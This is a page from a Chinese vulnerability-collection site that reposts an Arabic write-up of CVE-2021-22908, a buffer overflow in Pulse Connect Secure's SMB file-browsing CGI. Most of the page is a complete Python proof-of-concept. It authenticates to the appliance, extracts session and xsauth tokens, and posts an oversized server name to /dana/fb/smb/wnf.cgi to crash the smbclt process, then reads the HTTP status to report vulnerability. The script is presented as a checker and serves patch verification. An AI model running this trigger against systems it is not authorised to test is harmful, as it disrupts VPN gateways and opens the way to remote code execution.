CVE-2021-22908_Pulse_Connect_Secure_任意代碼執行漏洞_ar

# CVE-2021-22908 Pulse Connect Secure 任意代碼執行漏洞/ar

== وصف الثغرة ==

نظرًا لأن PCS يدعم الاتصال بمشاركة ملفات Windows (SMB) ، يتم توفير الوظيفة بواسطة البرامج النصية CGI المستندة إلى مكتبات Samba 4.5.10 والتطبيقات المساعدة. عند تحديد اسم خادم طويل لعمليات SMB معينة ، قد يتعطل تطبيق smbclt بسبب تجاوز سعة المخزن المؤقت ، اعتمادًا على طول اسم الخادم المحدد.

تم التأكد من أن نظام PCS 9.1R11.4 به هذه الثغرة الأمنية ، ونقطة نهاية CGI المستهدفة هي /dana/fb/smb/wnf.cgi. قد تؤدي نقاط نهاية CGI الأخرى أيضًا إلى تشغيل هذه الثغرة الأمنية.

إذا فشل المهاجم في التنظيف بعد نجاح استغلال هذه الثغرة الأمنية ، فقد يؤدي تحديد اسم خادم طويل إلى إدخالات سجل أحداث PCS التالية:

Critical ERR31093 2021-05-24 14:05:37 - ive - [127.0.0.1] Root::System()[] - Program smbclt recently failed.

ولكن لاستغلال هذه الثغرة الأمنية ، يجب أن يكون لدى خادم PCS سياسة وصول إلى ملفات Windows تسمح بـ \\ * أو سياسة أخرى تسمح للمهاجمين بالاتصال بأي خادم. يمكنك عرض سياسة SMB الحالية من خلال عرض المستخدم-> سياسة الموارد-> سياسة الوصول إلى ملفات Windows في صفحة إدارة PCS. تستخدم أجهزة 9.1R2 وأجهزة PCS الأقدم السياسة الافتراضية للسماح بالاتصالات بأي مضيف SMB. بدءًا من 9.1R3 ، تم تغيير هذه السياسة من الإذن الافتراضي إلى الرفض الافتراضي.

== نطاق التأثير ==
Pulse Connect Secure 9.0RX and 9.1RX

==POC==

#!/usr/bin/env python3
# Utility to check for Pulse Connect Secure CVE-2021-22908
# https://www.kb.cert.org/vuls/id/667933

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import argparse
import sys
from html.parser import HTMLParser
import getpass

parser = argparse.ArgumentParser(description='Pulse Connect Secure CVE-2021-22908')
parser.add_argument('host', type=str, help='PCS IP or hostname)')
parser.add_argument('-u', '--user', dest='user', type=str, help='username')
parser.add_argument('-p', '--pass', dest='password', type=str, help='password')
parser.add_argument('-r', '--realm', dest='realm', type=str, help='realm')
parser.add_argument('-d', '--dsid', dest='dsid', type=str, help='DSID')
parser.add_argument('-x', '--xsauth', dest='xsauth', type=str, help='xsauth')
parser.add_argument('-n', '--noauth', action='store_true', help='Do not authenticate. Only check for XML workaround')

args = parser.parse_args()

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

class formvaluefinder(HTMLParser):
    def __init__(self, searchval):
        super(type (self), self).__init__()
        self.searchval = searchval
    def handle_starttag(self, tag, attrs):
        if tag == 'input':
            # We're just looking for form  tags
            foundelement = False
            for attr in attrs:
                if(attr[0] == 'name'):
                    if(attr[1] == self.searchval):
                        foundelement = True
                elif(attr[0] == 'value' and foundelement == True):
                     self.data = attr[1]

class preauthfinder(HTMLParser):
    foundelement = False
    def handle_starttag(self, tag, attrs):
        if tag == 'textarea':
            # We're just looking for  tags
            foundelement = False
            for attr in attrs:
                if(attr[0] == 'id'):
                    if(attr[1] == 'sn-preauth-text_2'):
                        self.foundelement = True
    def handle_data(self, data):
        if self.foundelement:
            self.data = data
            self.foundelement = False



def get_realm(host, defaulturi):
    realm = None
    print('Getting default realm for %s...' % host)
    url = 'https://%s%s' % (host,defaulturi)
    res = None
    try:
        res = requests.get(url, verify=False, timeout=10)
    except requests.exceptions.ConnectionError:
        print('Error retrieving %s' % url)

    if res:
        if res.status_code == 200:
            html = str(res.content)
            if 'sn-preauth-text_2' in html:
                print('Preauth required...')
                parser = preauthfinder()
                parser.feed(html)
                preauthtext = parser.data
                values = {'sn-preauth-text': preauthtext, 'sn-preauth-proceed': 'Proceed'}
                res = requests.post(res.url, data=values, verify=False, allow_redirects=False, timeout=10)
                if res.content:
                    parser = formvaluefinder('realm')
                    parser.feed(str(res.content))
                    realm = parser.data
                else:
                    print('Error retrieving login page')

            else:
                parser = formvaluefinder('realm')
                parser.feed(html)
                realm = parser.data
    return realm

def get_dsid(host, defaulturi, realm, user, password):
    dsid = None
    loginuri = defaulturi.replace('welcome.cgi', 'login.cgi')
    url = 'https://%s%s' % (host,loginuri)
    values = {'username': user, 'password': password, 'realm': realm, 'btnSubmit': 'Sign In'}
    res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
    if 'confirm' in res.headers['location']:
        # Redirect to "user-confirm" that they still want to log in, despite already
        # having an active session
        print('User session is already active! Proceeding...')
        res = requests.post(url, data=values, verify=False, allow_redirects=True, timeout=10)
        parser = formvaluefinder('FormDataStr')
        parser.feed(str(res.content))
        formdata = parser.data
        values = {'btnContinue' : 'Continue the session', 'FormDataStr': formdata}
        res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
        for cookie in res.cookies:
            if cookie.name == 'DSID':
                dsid = cookie.value
    elif 'cred' in res.headers['location']:
        # This is a pulse that requires 2FA
        res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
        for cookie in res.cookies:
            if cookie.name == 'id':
                key = cookie.value
        password2 = input('MFA code: ')
        values = {'key': key, 'password#2': password2, 'btnSubmit': 'Sign In'}
        cookies = {'id': key, 'DSSigninNotif': '1'}
        res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=False, timeout=10)
        if 'confirm' in res.headers['location']:
            # Redirect to "user-confirm" that they still want to log in, despite already
            # having an active session
            print('User session is already active! Proceeding...')
            res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=True, timeout=10)
            parser = formvaluefinder('FormDataStr')
            parser.feed(str(res.content))
            formdata = parser.data
            values = {'btnContinue' : 'Continue the session', 'FormDataStr': formdata}
            res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=False, timeout=10)
            for cookie in res.cookies:
                if cookie.name == 'DSID':
                    dsid = cookie.value
        else:
            for cookie in res.cookies:
                if cookie.name == 'DSID':
                    dsid = cookie.value
    elif 'failed' in res.headers['location']:
        print('Login failed!')
    else:
        # Login accepted
        for cookie in res.cookies:
            if cookie.name == 'DSID':
                dsid = cookie.value

    return dsid


def get_xsauth(host, dsid):
    xsauth = None
    url = 'https://%s/dana/home/index.cgi' % host
    cookies = {'DSID':dsid}
    res = requests.get(url, verify=False, cookies=cookies, timeout=10)
    if 'xsauth' in str(res.content):
        parser = formvaluefinder('xsauth')
        parser.feed(str(res.content))
        xsauth = parser.data
    else:
        print('Cannot find xsauth string for provided DSID: %s' % dsid)
    return xsauth

def trigger_vul(host, dsid, xsauth):
    url = 'https://%s/dana/fb/smb/wnf.cgi' % host
    values = {
        't': 's',
        'v': '%s,,' % ('A' * 1800),
        'dir': 'tmp',
        'si': None,
        'ri': None,
        'pi': None,
        'confirm': 'yes',
        'folder': 'tmp',
        'acttype': 'create',
        'xsauth': xsauth,
        'create': 'Create Folder',
        }
    cookies = {'DSID': dsid}
    try:
        res = requests.post(url, data=values, verify=False, allow_redirects=False, cookies=cookies, timeout=60)
        status = res.status_code
        if 'DSIDFormDataStr' in str(res.content):
            # We got page asking to confirm our action
            print('xsauth value was not accepted')
        else:
            if status == 200 and 'Error FB-8' in str(res.content):
                print('HTTP %s.  Windows File Access Policies prevents exploitation.' % status)
            elif status == 200:
                print('HTTP %s.  Not vulnerable.' % status)
            elif status == 403:
                print('HTTP %s.  XML workaround applied.' % status)
            elif status == 500:
                print('HTTP %s.  %s is vulnerable to CVE-2021-22908!' % (status, host))
            elif status == 302:
                print('HTTP %s.  Are you sure your DSID is valid?' % host)
            else:
                print('HTTP %s.  Not sure how to interpret this result.' % status)
    except requests.exceptions.ReadTimeout:
        print('No response from server. Try again...')


def get_default(host):
    url = 'https://%s' % host
    res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
    try:
        location = res.headers['location']
        if 'dana-na' not in location:
            print('%s does not seem to be a PCS host' % host)
            location = None
    except:
        pass
    return location

def check_xml(host):
    url = 'https://%s/dana/meeting' % host
    #print('Checking status of %s ...' % url)
    res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
    if res.status_code == 403:
        print('Workaround-2104 appears to be installed')
    else:
        print('Workaround-2104 does NOT seem to be installed. Hope you are on R11.4 or later!')

    url = 'https://%s/dana-cached/fb/smb/wfmd.cgi' % host
    #print('Checking status of %s ...' % url)
    res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
    if res.status_code == 403:
        print('Workaround-2105 appears to be installed')
    else:
        print('Workaround-2105 does NOT seem to be installed. Hope you are on R11.5 or later!')


host = args.host
if args.noauth:
    check_xml(host)
else:
    defaulturi = get_default(host)
    if defaulturi:

        if not args.realm:
            realm = get_realm(host, defaulturi)
        else:
            realm = args.realm

        if realm:
            print('Realm: %s' % realm)
            if not args.user and not args.dsid:
                user = input('User: ')
            else:
                user = args.user
            if not args.password and not args.dsid:
                password = getpass.getpass()
            else:
                password = args.password
            if not args.dsid:
                dsid = get_dsid(host, defaulturi, realm, user, password)
                print('DSID: %s' % dsid)
            else:
                dsid = args.dsid
            if dsid:
                if not args.xsauth:
                    xsauth = get_xsauth(host, dsid)
                    print('xsauth: %s' % xsauth)
                else:
                    xsauth = args.xsauth
                if xsauth:
                    trigger_vul(host, dsid, xsauth)
</pre><p>== المرجع ==<br /> https://short.pwnwiki.org/?c=1NiPen</p><p>https://short.pwnwiki.org/?c=2Um6Rb</p></div><div class="em09 muted-3-color"><div><span>©</span> 版权声明</div><div class="posts-copyright">文章版权归作者所有，未经允许请勿转载。</div></div><div class="text-center theme-box muted-3-color box-body separator em09">THE END</div><div class="theme-box article-tags"><a class="but ml6 radius c-blue" title="查看更多分类文章" href="https://vip.bdziyi.com/category/ldk/ldxq/"><i class="fa fa-folder-open-o" aria-hidden="true"></i>国内漏洞库</a><br></div></div><div class="text-center muted-3-color box-body em09">喜欢就支持一下吧</div><div class="text-center post-actions"><a href="javascript:;" data-action="like" class="action action-like" data-pid="2329"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-like"></use></svg><text>点赞</text><count>0</count></a><span class="hover-show dropup action action-share"> <svg class="icon" aria-hidden="true"><use xlink:href="#icon-share"></use></svg><text>分享</text><div class="zib-widget hover-show-con share-button dropdown-menu"><div><a rel="nofollow" class="share-btn qzone"  target="_blank" title="QQ空间" href="https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=https://vip.bdziyi.com/2329/&title=CVE-2021-22908_Pulse_Connect_Secure_任意代碼執行漏洞_ar-棉花糖会员站&pics=https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg&summary=# CVE-2021-22908 Pulse Connect Secure 任意代碼執行漏洞/ar == وصف الثغرة == نظرًا لأن PCS يدعم الاتصال بمشاركة ملفات Windows (SMB) ، يتم توفير الوظيفة بواسطة البرامج النصية CGI المستندة إلى مكتبات Samba 4.5.10 والتطبيقا..."><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qzone-color"></use></svg></icon><text>QQ空间<text></a><a rel="nofollow" class="share-btn weibo"  target="_blank" title="微博" href="https://service.weibo.com/share/share.php?url=https://vip.bdziyi.com/2329/&title=CVE-2021-22908_Pulse_Connect_Secure_任意代碼執行漏洞_ar-棉花糖会员站&pic=https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg&searchPic=false"><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-weibo-color"></use></svg></icon><text>微博<text></a><a rel="nofollow" class="share-btn qq"  target="_blank" title="QQ好友" href="https://connect.qq.com/widget/shareqq/index.html?url=https://vip.bdziyi.com/2329/&title=CVE-2021-22908_Pulse_Connect_Secure_任意代碼執行漏洞_ar-棉花糖会员站&pics=https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg&desc=# CVE-2021-22908 Pulse Connect Secure 任意代碼執行漏洞/ar == وصف الثغرة == نظرًا لأن PCS يدعم الاتصال بمشاركة ملفات Windows (SMB) ، يتم توفير الوظيفة بواسطة البرامج النصية CGI المستندة إلى مكتبات Samba 4.5.10 والتطبيقا..."><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qq-color"></use></svg></icon><text>QQ好友<text></a><a rel="nofollow" class="share-btn poster" poster-share="2329" title="海报分享" href="javascript:;"><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-poster-color"></use></svg></icon><text>海报分享<text></a><a rel="nofollow" class="share-btn copy" data-clipboard-text="https://vip.bdziyi.com/2329/" data-clipboard-tag="链接" title="复制链接" href="javascript:;"><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-copy-color"></use></svg></icon><text>复制链接<text></a></div></div></span><a href="javascript:;" class="action action-favorite signin-loader" data-pid="2329"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-favorite"></use></svg><text>收藏</text><count></count></a></div></article><div class="yiyan-box main-bg theme-box text-center box-body radius8 main-shadow"><div data-toggle="tooltip" data-original-title="点击切换一言" class="yiyan"></div></div><div class="user-card zib-widget author"><div class="card-content mt10 relative"><div class="user-content"><div class="user-avatar"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-img avatar-lg"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="年费会员" alt="年费会员"></span></a></div><div class="user-info mt20 mb10"><div class="user-name flex jc"><name class="flex1 flex ac"><a class="display-name text-ellipsis " href="https://vip.bdziyi.com/author/1/">棉花糖</a><icon data-toggle="tooltip" title="站长" class="user-auth-icon ml3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-auth"></use></svg></icon><img  class="lazyload ml3 img-icon medal-icon" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/medal/medal-28.svg" data-toggle="tooltip" title="年度发烧元老"  alt="徽章-年度发烧元老-棉花糖会员站"><img  class="lazyload img-icon ml3" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://oss.bdziyi.com/vip/2024/09/20240921093134758.png" data-toggle="tooltip" title="LV6" alt="等级-LV6-棉花糖会员站"><a href="javascript:;" class="focus-color ml10 follow flex0 signin-loader" data-pid="1"><count><i class="fa fa-heart-o mr3" aria-hidden="true"></i>关注</count></a></name></div><div class="author-tag mt10 mini-scrollbar"><a class="but c-blue-2 tag-forum-post" data-toggle="tooltip" title="共0篇帖子" href="https://vip.bdziyi.com/author/1/?tab=forum"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-posts"></use></svg>0</a><a class="but c-blue tag-posts" data-toggle="tooltip" title="共4.7W+篇文章" href="https://vip.bdziyi.com/author/1/"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-post"></use></svg>4.7W+</a><a class="but c-green tag-comment" data-toggle="tooltip" title="共653条评论" href="https://vip.bdziyi.com/author/1/?tab=comment"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-comment"></use></svg>653</a><a class="but c-yellow tag-follow" data-toggle="tooltip" title="共218个粉丝" href="https://vip.bdziyi.com/author/1/?tab=follow"><i class="fa fa-heart em09"></i>218</a><span class="badg c-red tag-view" data-toggle="tooltip" title="人气值 188W+"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hot"></use></svg>188W+</span></div><div class="user-desc mt10 muted-2-color em09">公众号：棉花糖fans</div></div></div><div class="swiper-container more-posts swiper-scroll"><div class="swiper-wrapper"><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/77/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/11/20241126051508458.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="会员必看手册（20241201版本）-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">会员必看手册（20241201版本）</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">会员必看手册（20241201版本）</div><div class="px12 opacity8 mt6"><item>12月1日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 2W+</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/53919/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/11/20241118155703999.png" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="独家!超强代码审计工具上线！免费会员等你来嫖！-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">独家!超强代码审计工具上线！免费会员等你来嫖！</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">独家!超强代码审计工具上线！免费会员等你来嫖！</div><div class="px12 opacity8 mt6"><item>12月17日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 4386</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/129/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240626133442218.png" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="技术文章投稿兑换会员规则-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">技术文章投稿兑换会员规则</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">技术文章投稿兑换会员规则</div><div class="px12 opacity8 mt6"><item>3月25日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 4089</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/53274/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/10/20241008074929656.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="已开奖！国庆抽奖，猫咪赞助安全课程300份-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">已开奖！国庆抽奖，猫咪赞助安全课程300份</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">已开奖！国庆抽奖，猫咪赞助安全课程300份</div><div class="px12 opacity8 mt6"><item>9月29日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 3094</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/10860/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/04/20240401084118281.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="王老师src真正的完整版（49个学生分享视频版本）-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">王老师src真正的完整版（49个学生分享视频版本）</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">王老师src真正的完整版（49个学生分享视频版本）</div><div class="px12 opacity8 mt6"><item>6月8日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 2618</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/10456/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/04/20240401084118281.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="上心-SRC培训课-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">上心-SRC培训课</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">上心-SRC培训课</div><div class="px12 opacity8 mt6"><item>5月7日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 2533</item></div></div></div></a></div></div><div class="swiper-button-prev"></div><div class="swiper-button-next"></div></div></div></div><div class="theme-box" style="height:99px"><nav class="article-nav"><div class="main-bg box-body radius8 main-shadow"> <a href="https://vip.bdziyi.com/2207/"><p class="muted-2-color"><i class="fa fa-angle-left em12"></i><i class="fa fa-angle-left em12 mr6"></i>上一篇</p><div class="text-ellipsis-2"> JD-FreeFuck_後台命令執行漏洞_es</div> </a></div><div class="main-bg box-body radius8 main-shadow"> <a href="https://vip.bdziyi.com/2563/"><p class="muted-2-color">下一篇<i class="fa fa-angle-right em12 ml6"></i><i class="fa fa-angle-right em12"></i></p><div class="text-ellipsis-2"> CVE-2021-21985_VMware_vCenter_遠程任意代碼執行漏洞_tr</div> </a></div></nav></div><div class="theme-box relates relates-thumb"><div class="box-body notop"><div class="title-theme">相关推荐</div></div><div class="zib-widget"><div class="swiper-container swiper-scroll"><div class="swiper-wrapper"><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/10708/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="海康威视漏洞合集-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">海康威视漏洞合集</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">海康威视漏洞合集</div><div class="px12 opacity8 mt6"><item>6月1日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 1150</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/54134/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="易思智能物流无人值守系统 login SQL注入-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">易思智能物流无人值守系统 login SQL注入</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">易思智能物流无人值守系统 login SQL注入</div><div class="px12 opacity8 mt6"><item>11月6日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 794</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/53898/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="湖南强智教务管理系统存在 任意文件下载-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">湖南强智教务管理系统存在 任意文件下载</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">湖南强智教务管理系统存在 任意文件下载</div><div class="px12 opacity8 mt6"><item>10月21日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 738</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/55026/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="郑州时空-TMS运输管理系统 GetDataBase 信息泄露-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">郑州时空-TMS运输管理系统 GetDataBase 信息泄露</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">郑州时空-TMS运输管理系统 GetDataBase 信息泄露</div><div class="px12 opacity8 mt6"><item>1月5日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 682</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/53648/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/10/20241019092623668.png" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="投稿：多个poc-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">投稿：多个poc</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">投稿：多个poc</div><div class="px12 opacity8 mt6"><item>10月19日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 673</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/53963/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="金蝶天燕ApusicServer servicefactoryservice 远程命令执行-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">金蝶天燕ApusicServer servicefactoryservice 远程命令执行</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">金蝶天燕ApusicServer servicefactoryservice 远程命令执行</div><div class="px12 opacity8 mt6"><item>10月24日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 656</item></div></div></div></a></div></div><div class="swiper-button-prev"></div><div class="swiper-button-next"></div></div></div></div><div class="theme-box" id="comments"><div class="box-body notop"><div class="title-theme">评论 <small>抢沙发</small></div></div><div class="no_webshot main-bg theme-box box-body radius8 main-shadow"><div class="comment-signarea text-center box-body radius8"><h3 class="text-muted em12 theme-box muted-3-color">请登录后发表评论</h3><p> <a href="javascript:;" class="signin-loader but c-blue padding-lg"><i class="fa fa-fw fa-sign-in mr10" aria-hidden="true"></i>登录</a> <a href="javascript:;" class="signup-loader ml10 but c-yellow padding-lg"><svg class="icon mr10" aria-hidden="true"><use xlink:href="#icon-signup"></use></svg>注册</a></p><p class="social-separator separator muted-3-color em09">社交账号登录</p><div class="social_loginbar"><a rel="nofollow" title="微信登录" href="https://vip.bdziyi.com/oauth/weixingzh?rurl=https%3A%2F%2Fvip.bdziyi.com%2F2329%2F" class="social-login-item weixingzh toggle-radius qrcode-signin"><i class="fa fa-weixin" aria-hidden="true"></i></a></div></div><div id="postcomments"><ol class="commentlist list-unstyled"><div class="text-center comment-null" style="padding:30px 0;"><img style="width:280px;opacity: .7;" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/null-user.svg"><p style="margin-top:30px;" class="em09 muted-3-color separator">请登录后查看评论内容</p></div></ol></div></div></div></div></div><div class="sidebar"><div class="mb20"><div class="box-body notop"><div class="title-theme">作者</div></div><div class="user-card zib-widget widget"><div class="user-cover graphic" style="padding-bottom: 50%;"><img  class="lazyload fit-cover user-cover user-cover-id-1" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-lg.svg" data-src="https://oss.bdziyi.com/vip/2024/11/20241126045446604.png" alt="用户封面"></div><div class="card-content mt10 relative"><div class="user-content"><div class="user-avatar"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-img avatar-lg"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="年费会员" alt="年费会员"></span></a></div><div class="user-info mt20 mb10"><div class="user-name flex jc"><name class="flex1 flex ac"><a class="display-name text-ellipsis " href="https://vip.bdziyi.com/author/1/">棉花糖</a><icon data-toggle="tooltip" title="站长" class="user-auth-icon ml3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-auth"></use></svg></icon><img  class="lazyload ml3 img-icon medal-icon" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/medal/medal-28.svg" data-toggle="tooltip" title="年度发烧元老"  alt="徽章-年度发烧元老-棉花糖会员站"><img  class="lazyload img-icon ml3" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://oss.bdziyi.com/vip/2024/09/20240921093134758.png" data-toggle="tooltip" title="LV6" alt="等级-LV6-棉花糖会员站"><a href="javascript:;" class="focus-color ml10 follow flex0 signin-loader" data-pid="1"><count><i class="fa fa-heart-o mr3" aria-hidden="true"></i>关注</count></a></name></div><div class="author-tag mt10 mini-scrollbar"><a class="but c-blue-2 tag-forum-post" data-toggle="tooltip" title="共0篇帖子" href="https://vip.bdziyi.com/author/1/?tab=forum"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-posts"></use></svg>0</a><a class="but c-blue tag-posts" data-toggle="tooltip" title="共4.7W+篇文章" href="https://vip.bdziyi.com/author/1/"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-post"></use></svg>4.7W+</a><a class="but c-green tag-comment" data-toggle="tooltip" title="共653条评论" href="https://vip.bdziyi.com/author/1/?tab=comment"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-comment"></use></svg>653</a><a class="but c-yellow tag-follow" data-toggle="tooltip" title="共218个粉丝" href="https://vip.bdziyi.com/author/1/?tab=follow"><i class="fa fa-heart 